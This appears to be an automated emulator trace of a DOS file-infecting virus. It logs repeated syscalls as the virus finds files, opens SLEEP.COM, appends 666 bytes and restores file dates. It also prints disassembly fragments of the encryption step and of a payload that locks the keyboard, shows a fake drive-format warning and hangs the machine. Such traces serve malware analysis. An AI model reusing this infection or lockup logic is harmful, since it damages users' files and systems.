2018-12-25T12:43:30.684107251Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:30.693250066Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:30.705624834Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:30.708773478Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:30.711629142Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:30.718295523Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:30.729425337Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:30.737505402Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:30.739447853Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:30.746895789Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:30.748678697Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:30.752159187Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:30.761701572Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:30.764476366Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:30.77337394Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:30.775411152Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:30.784498656Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:30.792729314Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:30.794876152Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:30.796230119Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:30.800667355Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:30.807668391Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:30.815799728Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:30.818108569Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:30.822846908Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:30.825566864Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:30.829387911Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:30.838334531Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:30.839530913Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:30.844905454Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:30.846983189Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:30.856052274Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:30.867379628Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:30.871763243Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:30.873145344Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:30.879930789Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:30.896264743Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:30.909405487Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:30.911233433Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:30.919691196Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:30.921442775Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:30.924483383Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:30.935335187Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:30.93719673Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:30.944765679Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:30.947307482Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:30.956857075Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:30.967829775Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:30.972369817Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:30.973846063Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:30.985884518Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:30.99791211Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:31.006966451Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:31.009297012Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:31.017382206Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:31.020184812Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:31.023529336Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:31.034753424Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:31.037356285Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:31.045659619Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:31.047882499Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:31.058364169Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:31.070938699Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:31.074245801Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:31.076820378Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:31.083479093Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:31.094578289Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:31.108957031Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:31.110822066Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:31.118470445Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:31.120718877Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:31.129857958Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:31.14113696Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:31.143902523Z 78 PC: 12c06 | Find first file
2018-12-25T12:43:31.151205249Z 78 PC: 12c06 | Find first file (See above)
2018-12-25T12:43:31.157904118Z 78 PC: 12b97 | Find first file
2018-12-25T12:43:31.17019417Z 44 PC: 12cc5 | Get time 0x12cc5: cmp ch, cl
0x12cc7: je 0x12cca
0x12cc9: ret
0x12cca: cli
0x12ccb: mov al, 0xad
0x12ccd: out 0x64, al
0x12ccf: nop
0x12cd0: sti
0x12cd1: mov dx, di
0x12cd3: add dx, 0x218
0x12cd7: mov ah, 9
0x12cd9: int 0x21
0x12cdb: cli
0x12cdc: jmp 0x12cdc
0x12cde: add word ptr [bx], di
0x12ce0: aas
0x12ce1: aas
0x12ce2: aas
0x12ce3: aas
0x12ce4: aas
2018-12-25T12:43:31.173619185Z 26 PC: 12ad6 | Set disk transfer address

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":15470,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:43:30.761997065Z 26 PC: 12aa4 | Set disk transfer address
2018-12-25T12:43:30.763874461Z 78 PC: 12ab7 | Find first file
2018-12-25T12:43:30.769721111Z 47 PC: 12abd | Get disk transfer address
2018-12-25T12:43:30.771090132Z 67 PC: 12c43 | Get or set file attributes
2018-12-25T12:43:30.77796513Z 67 PC: 12c4b | Get or set file attributes
2018-12-25T12:43:30.79426787Z 61 PC: 12c51 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:43:30.8018146Z 87 PC: 12c58 | Get or set file date and time
2018-12-25T12:43:30.804484176Z 63 PC: 12af6 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:43:30.811066268Z 66 PC: 12b19 | Move file pointer
2018-12-25T12:43:30.812755372Z 44 PC: 12a6e | Get time 0x12a6e: xor cx, dx
0x12a70: xor ch, cl
0x12a72: mov byte ptr [di + 0x10], ch
0x12a75: call 0x22a4e
0x12a78: pop bx
0x12a79: popaw
0x12a7a: mov ah, byte ptr [di + 9]
0x12a7d: mov cx, 0x29a
0x12a80: nop
0x12a81: mov dx, di
0x12a83: int 0x21
0x12a85: pushaw
0x12a86: call 0x22a4e
0x12a89: pop bx
0x12a8a: popaw
0x12a8b: ret
0x12a8c: xchg si, di
0x12a8e: pop si
0x12a8f: sub si, 6
0x12a92: push si
2018-12-25T12:43:30.815395001Z 64 PC: 12a85 | Write file or device (Write 666 bytes on handle 5)
2018-12-25T12:43:30.825256398Z 66 PC: 12b37 | Move file pointer
2018-12-25T12:43:30.826911318Z 64 PC: 12b57 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:43:30.833655825Z 87 PC: 12b60 | Get or set file date and time
2018-12-25T12:43:30.838990777Z 62 PC: 12b66 | Close file
2018-12-25T12:43:30.846767422Z 67 PC: 12b6d | Get or set file attributes
2018-12-25T12:43:30.857121869Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:30.861734675Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:30.863134685Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:30.869212794Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:30.880699042Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:30.892412457Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:30.894792177Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:30.901884595Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:30.903703846Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:30.906417398Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:30.915127809Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:30.916909746Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:30.923585763Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:30.925596321Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:30.95091996Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:30.96133326Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:30.964714311Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:30.966611867Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:30.972671986Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:30.982883826Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:30.991066481Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:30.992690562Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:30.999293834Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:31.001996136Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:31.004660548Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:31.013205453Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:31.015655157Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:31.022379696Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:31.024118118Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:31.033105155Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:31.043152544Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:31.045997523Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:31.048065095Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:31.054531862Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:31.064020627Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:31.074525594Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:31.076020971Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:31.082299326Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:31.084342096Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:31.086662385Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:31.09503133Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:31.097242879Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:31.104178311Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:31.105658167Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:31.222761902Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:31.403037558Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:31.406217336Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:31.408089795Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:31.415186344Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:31.609656046Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:31.617120513Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:31.618757825Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:31.622994883Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:31.623964602Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:31.626880358Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:31.804691181Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:31.806684975Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:31.816183071Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:31.818391252Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:32.0503607Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:32.132421792Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:32.134957255Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:32.135972486Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:32.141816475Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:32.151208317Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:32.162751187Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:32.164562496Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:32.170694769Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:32.172059903Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:32.174728752Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:32.183515637Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:32.184836944Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:32.191501314Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:32.192940957Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:32.200556285Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:32.210381024Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:32.212866186Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:32.213908898Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:32.219784661Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:32.229637596Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:32.236175945Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:32.238731941Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:32.245353287Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:32.247065429Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:32.250588335Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:32.259251426Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:32.260821065Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:32.268195469Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:32.269736696Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:32.27728067Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:32.287457497Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:32.290617637Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:32.291582603Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:32.297388433Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:32.306693507Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:32.31291466Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:32.314480628Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:32.320559921Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:32.321850004Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:32.328998486Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:32.338500418Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:32.34003801Z 78 PC: 12c06 | Find first file
2018-12-25T12:43:32.343965031Z 78 PC: 12c06 | Find first file (See above)
2018-12-25T12:43:32.35485774Z 78 PC: 12b97 | Find first file
2018-12-25T12:43:32.360621141Z 44 PC: 12cc5 | Get time 0x12cc5: cmp ch, cl
0x12cc7: je 0x12cca
0x12cc9: ret
0x12cca: cli
0x12ccb: mov al, 0xad
0x12ccd: out 0x64, al
0x12ccf: nop
0x12cd0: sti
0x12cd1: mov dx, di
0x12cd3: add dx, 0x218
0x12cd7: mov ah, 9
0x12cd9: int 0x21
0x12cdb: cli
0x12cdc: jmp 0x12cdc
0x12cde: add word ptr [bx], di
0x12ce0: aas
0x12ce1: aas
0x12ce2: aas
0x12ce3: aas
0x12ce4: aas
2018-12-25T12:43:32.36249078Z 9 PC: 12cdb | Display string (String= ' WARNING: ALL DATA ON NON-REMOVABLE DISK DRIVE C: WILL BE LOST! Proced with Format (Y/N)? Yes Ok')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":1,"Second":0,"TimeBased":true,"OriginalID":15470,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:43:30.804714561Z 26 PC: 12aa4 | Set disk transfer address
2018-12-25T12:43:30.806061867Z 78 PC: 12ab7 | Find first file
2018-12-25T12:43:30.812909269Z 47 PC: 12abd | Get disk transfer address
2018-12-25T12:43:30.81417988Z 67 PC: 12c43 | Get or set file attributes
2018-12-25T12:43:30.820545424Z 67 PC: 12c4b | Get or set file attributes
2018-12-25T12:43:30.838119098Z 61 PC: 12c51 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:43:30.845827637Z 87 PC: 12c58 | Get or set file date and time
2018-12-25T12:43:30.84756607Z 63 PC: 12af6 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:43:30.855369862Z 66 PC: 12b19 | Move file pointer
2018-12-25T12:43:30.85786615Z 44 PC: 12a6e | Get time 0x12a6e: xor cx, dx
0x12a70: xor ch, cl
0x12a72: mov byte ptr [di + 0x10], ch
0x12a75: call 0x22a4e
0x12a78: pop bx
0x12a79: popaw
0x12a7a: mov ah, byte ptr [di + 9]
0x12a7d: mov cx, 0x29a
0x12a80: nop
0x12a81: mov dx, di
0x12a83: int 0x21
0x12a85: pushaw
0x12a86: call 0x22a4e
0x12a89: pop bx
0x12a8a: popaw
0x12a8b: ret
0x12a8c: xchg si, di
0x12a8e: pop si
0x12a8f: sub si, 6
0x12a92: push si
2018-12-25T12:43:30.860905088Z 64 PC: 12a85 | Write file or device (Write 666 bytes on handle 5)
2018-12-25T12:43:30.874076248Z 66 PC: 12b37 | Move file pointer
2018-12-25T12:43:30.875605183Z 64 PC: 12b57 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:43:30.882934237Z 87 PC: 12b60 | Get or set file date and time
2018-12-25T12:43:30.884847128Z 62 PC: 12b66 | Close file
2018-12-25T12:43:30.893810205Z 67 PC: 12b6d | Get or set file attributes
2018-12-25T12:43:30.905852211Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:30.909590802Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:30.911292155Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:30.91813331Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:30.929539709Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:30.940910395Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:30.942895968Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:30.950636199Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:30.953430165Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:30.956525741Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:30.96634258Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:30.969135866Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:30.976696158Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:30.978523153Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:30.988217196Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:30.999562007Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:31.003823414Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:31.006797101Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:31.013471519Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:31.024800534Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:31.033716586Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:31.036179447Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:31.044343424Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:31.047205226Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:31.064702967Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:31.074755774Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:31.07648708Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:31.085384485Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:31.087452328Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:31.097201084Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:31.123827917Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:31.127103715Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:31.129684787Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:31.137065732Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:31.148262475Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:31.155927732Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:31.158601577Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:31.16687289Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:31.168890797Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:31.171919603Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:31.18217914Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:31.183980063Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:31.191168042Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:31.194033819Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:31.203134931Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:31.21417003Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:31.218236567Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:31.219458247Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:31.225430511Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:31.236511356Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:31.243976283Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:31.245716244Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:31.253054555Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:31.255955272Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:31.259091792Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:31.269082127Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:31.271870862Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:31.279300583Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:31.281164283Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:31.290942636Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:31.306192905Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:31.309485354Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:31.31157266Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:31.318061806Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:31.329821532Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:31.337851207Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:31.339669603Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:31.347068136Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:31.348993787Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:31.352467964Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:31.362807717Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:31.364788775Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:31.373361061Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:31.375092538Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:31.384443987Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:31.396611223Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:31.399533882Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:31.400997711Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:31.408262631Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:31.420024571Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:31.427829002Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:31.430196305Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:31.43753743Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:31.439507712Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:31.444097958Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:31.454008209Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:31.456834671Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:31.464437918Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:31.467699406Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:31.476742628Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:31.488260405Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:31.492739765Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:31.49444487Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:31.5011131Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:31.509867423Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:31.517193726Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:31.518338291Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:31.524081498Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:31.526299332Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:31.534604722Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:31.548589381Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:31.552435662Z 78 PC: 12c06 | Find first file
2018-12-25T12:43:31.560024046Z 78 PC: 12c06 | Find first file (See above)
2018-12-25T12:43:31.567803643Z 78 PC: 12b97 | Find first file
2018-12-25T12:43:31.585710747Z 44 PC: 12cc5 | Get time 0x12cc5: cmp ch, cl
0x12cc7: je 0x12cca
0x12cc9: ret
0x12cca: cli
0x12ccb: mov al, 0xad
0x12ccd: out 0x64, al
0x12ccf: nop
0x12cd0: sti
0x12cd1: mov dx, di
0x12cd3: add dx, 0x218
0x12cd7: mov ah, 9
0x12cd9: int 0x21
0x12cdb: cli
0x12cdc: jmp 0x12cdc
0x12cde: add word ptr [bx], di
0x12ce0: aas
0x12ce1: aas
0x12ce2: aas
0x12ce3: aas
0x12ce4: aas
2018-12-25T12:43:31.588205833Z 26 PC: 12ad6 | Set disk transfer address